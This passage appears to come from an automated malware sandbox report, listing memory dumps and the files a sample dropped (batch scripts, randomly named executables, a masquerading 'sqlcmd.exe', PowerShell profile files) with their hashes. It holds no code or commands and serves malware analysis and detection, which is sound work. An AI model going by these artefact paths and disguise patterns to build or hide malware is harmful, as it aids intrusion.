SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2124-225-0x0000000000000000-mapping.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/4064-227-0x0000000000000000-mapping.dmp

memory/2140-229-0x0000000005460000-0x00000000054D2000-memory.dmp

memory/3396-228-0x00000000053F0000-0x0000000005462000-memory.dmp

memory/3616-230-0x0000000005060000-0x00000000050D7000-memory.dmp

memory/3396-231-0x0000000005380000-0x00000000053A0000-memory.dmp

memory/2140-232-0x00000000053F0000-0x000000000540F000-memory.dmp

memory/3616-233-0x0000000004FF0000-0x0000000005016000-memory.dmp

memory/3760-234-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3760-237-0x0000000000403BEE-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2112-246-0x0000000000000000-mapping.dmp

memory/1200-244-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2908-249-0x0000000000000000-mapping.dmp

memory/3632-239-0x000000000040616E-mapping.dmp

memory/3632-236-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Windows\temp\knyx0wed.inf

MD5 8db779d0434eb3ddf134396371628212
SHA1 8b4861426b06661c3bc70e4ce2fad59b12002114
SHA256 bfc515c04a6e1e1ef9286f84f1d8ae06656806ed309674fb20e23fa1006baf27
SHA512 388d88dc8266d04e67548b8f78cced5bf447c774e609b531b4585dd41161fbc31a7742c4f2769d1c34711891d72d21cb5073d83f1a9296c8b460d0c4ffca3555

C:\Users\Admin\AppData\Local\Temp\tmpE85D.tmp

MD5 bc2b6748d2661e9ce52308b3370f3cd3
SHA1 525a293e2aae508e0963f4a4a4c6927f8528e31a
SHA256 44049739773b479c5cbb04a4bf8371d0d365a7be7c65f765c62a57358f346e82
SHA512 568d161df4269764b26ce7c8e1f9ed8a726f6bf7234b8a2b1427ca14c30f90ca789f561a9e815a15940570d542e4baa656c002ff1f4be32dd5c7857b8e576957

memory/2112-254-0x0000000000D30000-0x0000000000D31000-memory.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2112-257-0x0000000006F90000-0x0000000006F91000-memory.dmp

memory/2884-259-0x000000000040C71E-mapping.dmp

memory/2884-256-0x0000000000400000-0x0000000000412000-memory.dmp

memory/2888-258-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/504-263-0x0000000000000000-mapping.dmp

memory/2260-264-0x0000000000000000-mapping.dmp

memory/3632-265-0x0000000005410000-0x000000000590E000-memory.dmp

memory/2112-266-0x0000000006950000-0x0000000006951000-memory.dmp

memory/3632-268-0x0000000005410000-0x000000000590E000-memory.dmp

memory/2112-267-0x0000000006C00000-0x0000000006C01000-memory.dmp

memory/2112-269-0x0000000006952000-0x0000000006953000-memory.dmp

memory/2112-270-0x0000000006D80000-0x0000000006D81000-memory.dmp

memory/2112-271-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

memory/2112-273-0x00000000075C0000-0x00000000075C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eGEyY1HRgn.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

memory/2204-275-0x0000000000000000-mapping.dmp

memory/3156-277-0x0000000000000000-mapping.dmp

C:\Windows\Temp\5j402p4w.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/2112-276-0x0000000006850000-0x0000000006851000-memory.dmp

C:\Windows\temp\5j402p4w.exe

MD5 f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1 ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA256 88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA512 02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

memory/1180-283-0x0000000000000000-mapping.dmp

memory/3812-284-0x0000000000000000-mapping.dmp

memory/3812-299-0x0000029E7B173000-0x0000029E7B175000-memory.dmp

memory/3812-298-0x0000029E7B170000-0x0000029E7B172000-memory.dmp

memory/2884-300-0x0000000005450000-0x0000000005451000-memory.dmp

memory/3812-301-0x0000029E7B176000-0x0000029E7B178000-memory.dmp

memory/2112-343-0x000000007E540000-0x000000007E541000-memory.dmp

memory/2204-347-0x0000000000000000-mapping.dmp

memory/3520-348-0x0000000000000000-mapping.dmp

memory/3000-349-0x0000000000000000-mapping.dmp

memory/3976-352-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/2644-358-0x0000000000000000-mapping.dmp

memory/2600-366-0x0000000000000000-mapping.dmp

memory/2112-371-0x0000000006953000-0x0000000006954000-memory.dmp

memory/2204-374-0x000001CCB8CD0000-0x000001CCB8CD2000-memory.dmp

memory/2204-377-0x000001CCB8CD3000-0x000001CCB8CD5000-memory.dmp

memory/3520-380-0x000001EA01480000-0x000001EA01482000-memory.dmp

memory/3520-383-0x000001EA01483000-0x000001EA01485000-memory.dmp

memory/3000-388-0x000002CABE170000-0x000002CABE172000-memory.dmp

memory/4228-385-0x0000000000000000-mapping.dmp

memory/3000-392-0x000002CABE173000-0x000002CABE175000-memory.dmp

memory/4364-397-0x0000000000000000-mapping.dmp

memory/4500-406-0x0000000000000000-mapping.dmp

memory/4620-415-0x0000000000000000-mapping.dmp

memory/4704-420-0x0000000000000000-mapping.dmp

memory/4764-425-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2703180e64df93bbcc34f7701979fd13
SHA1 c9265214fdd8c4fa9cb6b3977b0e05fc8c25125b
SHA256 0d0b3fed5285ce6cddc06f3c15d6cccb68e23d8a027d0cba6226100f130ae173
SHA512 8b711d620a4d10d044ddf5c4fa83169304886a998ea11671b9de992383fd9d39cfeebb9ffdfaafb44ef27cb91a54ac732463779a672889d1b5be33cc4207e4f3

memory/3976-436-0x000002299AB30000-0x000002299AB32000-memory.dmp

memory/4984-443-0x0000000000000000-mapping.dmp

memory/3976-440-0x000002299AB33000-0x000002299AB35000-memory.dmp

memory/2644-447-0x0000020F3BE33000-0x0000020F3BE35000-memory.dmp

memory/2644-444-0x0000020F3BE30000-0x0000020F3BE32000-memory.dmp

memory/2600-450-0x000001F2B9750000-0x000001F2B9752000-memory.dmp

memory/4500-455-0x00000241294E0000-0x00000241294E2000-memory.dmp

memory/4500-459-0x00000241294E3000-0x00000241294E5000-memory.dmp

memory/2600-461-0x000001F2B9753000-0x000001F2B9755000-memory.dmp

memory/4620-466-0x0000023F3AF50000-0x0000023F3AF52000-memory.dmp

memory/4620-472-0x0000023F3AF53000-0x0000023F3AF55000-memory.dmp

memory/4228-476-0x00000294FF650000-0x00000294FF652000-memory.dmp

memory/4228-478-0x00000294FF653000-0x00000294FF655000-memory.dmp

memory/4764-486-0x000001ECF6E93000-0x000001ECF6E95000-memory.dmp

memory/4764-481-0x000001ECF6E90000-0x000001ECF6E92000-memory.dmp

memory/4364-488-0x000001DFD3470000-0x000001DFD3472000-memory.dmp

memory/4364-491-0x000001DFD3473000-0x000001DFD3475000-memory.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/4984-534-0x000002AC7BB70000-0x000002AC7BB72000-memory.dmp

memory/4984-536-0x000002AC7BB73000-0x000002AC7BB75000-memory.dmp

memory/3000-540-0x000002CABE176000-0x000002CABE178000-memory.dmp

memory/4756-544-0x0000000000000000-mapping.dmp

memory/3520-607-0x000001EA01486000-0x000001EA01488000-memory.dmp

memory/2204-605-0x000001CCB8CD6000-0x000001CCB8CD8000-memory.dmp

memory/2600-644-0x000001F2B9756000-0x000001F2B9758000-memory.dmp

memory/3976-641-0x000002299AB36000-0x000002299AB38000-memory.dmp

memory/2644-646-0x0000020F3BE36000-0x0000020F3BE38000-memory.dmp

memory/4364-682-0x000001DFD3476000-0x000001DFD3478000-memory.dmp

memory/4500-687-0x00000241294E6000-0x00000241294E8000-memory.dmp

memory/4228-695-0x00000294FF656000-0x00000294FF658000-memory.dmp

memory/4620-691-0x0000023F3AF56000-0x0000023F3AF58000-memory.dmp

memory/4764-738-0x000001ECF6E96000-0x000001ECF6E98000-memory.dmp

memory/4984-782-0x000002AC7BB76000-0x000002AC7BB78000-memory.dmp

memory/3000-1007-0x000002CABE178000-0x000002CABE179000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7da67fae516954e5aa76aaa9803fc518
SHA1 8f80266076379de1f5c54c46647d9917598fa6fe
SHA256 c192ad2a2901e61158926110db73b5b39436198b536cc83a2b94c4c93ed9cd9c
SHA512 89a37e5e1764148b98f7898a6d016cee9aedd3c7277b1864b02e8f30229d377bb5b4f1fb338f5b9b8d32e9202fb9262feb82ed2beaa30f785d93adcd7b659c13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e9f583acc0bc47529362031be117a67f
SHA1 fd6ae4d148a5a929adb4f8aeea4598fee8b5632b
SHA256 9e36f922cdd1a2ee707b855b7602948b3488acbb57fa4b7b9f941252de50e1cb
SHA512 89f589caad02264078a203708dad7db2bcc2a9e65c39daac66734d5dca524b085339473ba7247c04dd19c41c22b06cd87545c82f24559a5498b8241f68d857fd

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9mbL1Q6aMm.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e7fbe7a8da9b46f947deb2a02e6a293a
SHA1 0ad189b28e53dcbd009b42cd7eb2430a65ca3dd0
SHA256 951ab267c169c9ee3d704a97b555e5c0edc0622ab4a61cddddcbebf6600fe4fd
SHA512 d3b8bb243f93d651616a151e8f7cf23e6064ea0c53cef7f884ee6e4021dcfeb9162882bba17a298aa959f086ade78e6280c7637be514015659b842da07abf638

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c4a1170749620a355075b19d68f94c45
SHA1 44c72e0567e8c23dc20756b2d67a05b1f1c382f4
SHA256 61110a7a59f15f40d850aff166176709c60659a9dd13359a2522d1abebd7fc28
SHA512 985ae4e05070ce3a1c870bf9bfef2b439bc1571d3b97c17cdcd2630ebec209e74d5e77f8025c1e0ac2949cbddb0148990b3df92c844cfad8a8805de249dcda95

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4c4be4c0fec9602d69dcf439fd31fc22
SHA1 a9d1c38bb4b66804a72a6d6e2125ef142e3b5a7e
SHA256 325a8917d99e3d1139e13b6dfcd48ee05607ea4cf2e9d82586400a5b506871e9
SHA512 8d48abc5b0c9d66cc26cc2bd44b383a010772b9fef48dee8d334e7e95126cfa258c501ff9380ced58fad175fa680db3e5d12b820e4b3125521874835c803d268

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ba0139766ca30cf3f464824d085b10c
SHA1 5ed3957458fdbb0808aa728fbe1909f980027dfd
SHA256 b7bbec16489e7f4150e344354c2f29ddd05bdd6ca0cfa0f1b4261afc90a746a8
SHA512 8ac5e3cfd0dba656181a65e25ca25531defc0882c70d40063b56c1733a3d6d916fd440d439cc2e69b64f2cc188868642082f29373f5a96c8191fcaa3ce44eaf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ba0139766ca30cf3f464824d085b10c
SHA1 5ed3957458fdbb0808aa728fbe1909f980027dfd
SHA256 b7bbec16489e7f4150e344354c2f29ddd05bdd6ca0cfa0f1b4261afc90a746a8
SHA512 8ac5e3cfd0dba656181a65e25ca25531defc0882c70d40063b56c1733a3d6d916fd440d439cc2e69b64f2cc188868642082f29373f5a96c8191fcaa3ce44eaf1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 910aa6d9c2c158f6cdc2b70bed5f8e21
SHA1 92aaf8e3712de7214db3363cf889adcbf505262a
SHA256 49f19d00e846ec6dd9ddbf52d34a0d1242bf06545c15a827aa17574730f7f983
SHA512 13ed87b34afa1a4575eaa45fffba2fbcc1ea41308906fd9cd2cea351eca7d482f9440f8439a82b0e3b64fd9c80dcbe61d80b8894fdeeeac5a55fb6729b3a8c17

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c98616c86234db93dccdfb357228418c
SHA1 e6f7195988be75fce8bd20d7a10cb3f94dae610c
SHA256 699a1cff1f1ef5bdc06568bd9b10cf93f51ae1cfaff3794648872d8434cebf72
SHA512 57bc0dee56a6087152d71f6cd64a197fd721b1ef6027aa88bafd060a96bb6c99207f5eb3d6d9a419623f885ed99996809d2776ce436a86504a1320eb85b9eb68

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 368b32a9ff59549cdd930323b9f865b4
SHA1 94289afbd7d4a4e651ca376b88174074939e2aef
SHA256 a1bf4f35c43a08cac057588788cfd403e5645f53e694c858a6339be0887e2b10
SHA512 a5b409c6d9e6abd934625b9a2aaa1bd0a69c2260571b1d309205aad03e750e7a05ed488a1c40cab197ab9bfaaf2c9d6b1e966a5a6c5009916f02c10a51dfa4b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 368b32a9ff59549cdd930323b9f865b4
SHA1 94289afbd7d4a4e651ca376b88174074939e2aef
SHA256 a1bf4f35c43a08cac057588788cfd403e5645f53e694c858a6339be0887e2b10
SHA512 a5b409c6d9e6abd934625b9a2aaa1bd0a69c2260571b1d309205aad03e750e7a05ed488a1c40cab197ab9bfaaf2c9d6b1e966a5a6c5009916f02c10a51dfa4b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180